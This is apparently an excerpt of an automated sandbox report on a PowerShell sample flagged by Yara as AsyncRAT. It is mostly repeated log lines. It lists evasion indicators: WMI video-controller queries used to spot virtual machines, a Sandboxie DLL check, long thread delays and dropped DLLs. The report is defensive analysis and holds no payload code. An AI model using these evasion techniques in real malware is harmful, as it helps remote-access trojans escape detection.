              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Yara detected AsyncRAT
              Source: Yara matchFile source: 13.2.powershell.exe.1e877e60000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.powershell.exe.1e877e60000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.powershell.exe.1e8602f8028.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000D.00000002.2820330818.000001E877E60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
              Source: powershell.exe, 0000000D.00000002.2820330818.000001E877E60000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.2732958403.000001E860795000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2732958403.000001E85F93F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3642Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6208Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 634Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1048Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6093Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3654Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5329Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4334Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1091
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4518
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5229
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\s4dvafav\s4dvafav.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\thvmfbzv\thvmfbzv.dllJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4120Thread sleep time: -11068046444225724s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3004Thread sleep count: 634 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3372Thread sleep count: 1048 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2836Thread sleep count: 138 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3360Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 988Thread sleep count: 6093 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4460Thread sleep count: 3654 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5312Thread sleep time: -24903104499507879s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2124Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6324Thread sleep time: -23980767295822402s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5784Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5784Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4700Thread sleep count: 1091 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4980Thread sleep count: 106 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3100Thread sleep count: 191 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3056Thread sleep time: -922337203685477s >= -30000s
